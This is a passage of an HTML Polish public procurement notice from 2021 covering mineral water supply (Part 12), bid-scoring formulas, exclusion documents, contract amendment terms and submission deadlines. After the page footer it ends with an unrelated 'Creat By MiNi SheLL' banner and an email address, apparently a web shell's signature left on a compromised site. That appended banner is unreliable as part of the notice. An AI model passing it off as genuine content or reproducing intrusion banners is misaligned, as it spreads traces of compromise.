obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Naturalna woda mineralna<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Naturalna woda mineralna gazowana (nasycona CO2)	l	9 000<br/>2	Naturalna woda mineralna niegazowana	l	3 000 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6270,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15981000-8 - Wody mineralne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15981200-0 - Gazowane wody mineralne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. DOKUMENTY SKŁADANE PRZEZ WSZYSTKICH WYKONAWCÓW DO OFERTY: <br/>1) Na potwierdzenie spełniania warunków, o których mowa w art. 112 ust. 1 ustawy Pzp, wykonawca składa do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SWZ);<br/>2) Na potwierdzenie wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których stanowi art. 108 ust. 1 i art. 109 ust. 1 pkt 4 ustawy Pzp, wykonawca składa do oferty oświadczenie o niepodleganiu wykluczenia (zał. nr 3 do SWZ).<br/>2. DOKUMENTY SKŁADANE NA WEZWANIE ZAMAWIAJĄCEGO:<br/>Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, sporządzonego nie wcześniej niż 3 m-ce przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3. DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:<br/>1) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w ust. 2, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury – wystawiony nie wcześniej niż 3 m-ce przed ich złożeniem;<br/>2) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, sporządzonego nie wcześniej niż 3 m-ce przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>W przypadku wskazania przez wykonawcę w oświadczeniu (zał. nr 3 ), dostępności podmiotowych środków dowodowych, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych podmiotowe środki dowodowe.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Na potwierdzenie spełniania warunków, o których mowa w art. 112 ust. 1 ustawy Pzp, wykonawca składa do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SWZ);<br/>2) Na potwierdzenie wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których stanowi art. 108 ust. 1 i art. 109 ust. 1 pkt 4 ustawy Pzp, wykonawca składa do oferty oświadczenie o niepodleganiu wykluczenia (zał. nr 3 do SWZ).<br/>DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:<br/>1) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w ust. 2, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury – wystawiony nie wcześniej niż 3 m-ce przed ich złożeniem; 2) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna). W tym przypadku ustanawiają pełnomocnika do reprezentowania mocodawców w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego. <br/>2) Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem.<br/>3) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.<br/>4) Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.<br/>5) Na ofertę wykonawców wspólnie ubiegających się o zamówienie składają się dokumenty: <br/>a) pełnomocnictwo, o którym mowa w art. 58 ust. 2 ustawy Pzp, które zawiera m.in.: nazwy i adresy członków, nazwę i adres pełnomocnika, zakres pełnomocnictwa, datę udzielenia pełnomocnictwa oraz podpisy przedstawicieli członków, zgodnie z zasadami reprezentacji;<br/>b) oświadczenia wyszczególnione w ust. 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>6) Jeżeli oferta wykonawców zostanie wybrana jako najkorzystniejsza, Zamawiający przed zawarciem umowy w sprawie zamówienia publicznego będzie żądać umowy regulującej współpracę tych wykonawców.<br/>5. W przypadku wskazania przez wykonawcę w oświadczeniu (zał. nr 3 ), dostępności podmiotowych środków dowodowych, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych podmiotowe środki dowodowe. <br/>6. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>7. W przypadku wątpliwości interpretacyjnych dotyczących rodzajów dokumentów oraz formy ich składania w niniejszym postępowaniu rozstrzygającym jest rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 454 i art. 455 ustawy Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.).<br/>2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:<br/>1) nazwy, adresu oraz osób reprezentujących strony; <br/>2) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy;<br/>3) każdej zmiany która jest korzystna dla zamawiającego lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego, przy czym zmiana ta nie może dotyczyć wzrostu ceny dostarczanych artykułów.<br/>3. Strona i wykonawca wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.<br/>4. Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu, z zastrzeżeniem pkt 5.<br/>5. Strony i wykonawca dopuszczają możliwość okresowych dostaw artykułów po cenie niższej niż określonej w załączniku nr 1 do umowy (tzw. promocja). Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-08 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-08 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-06</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com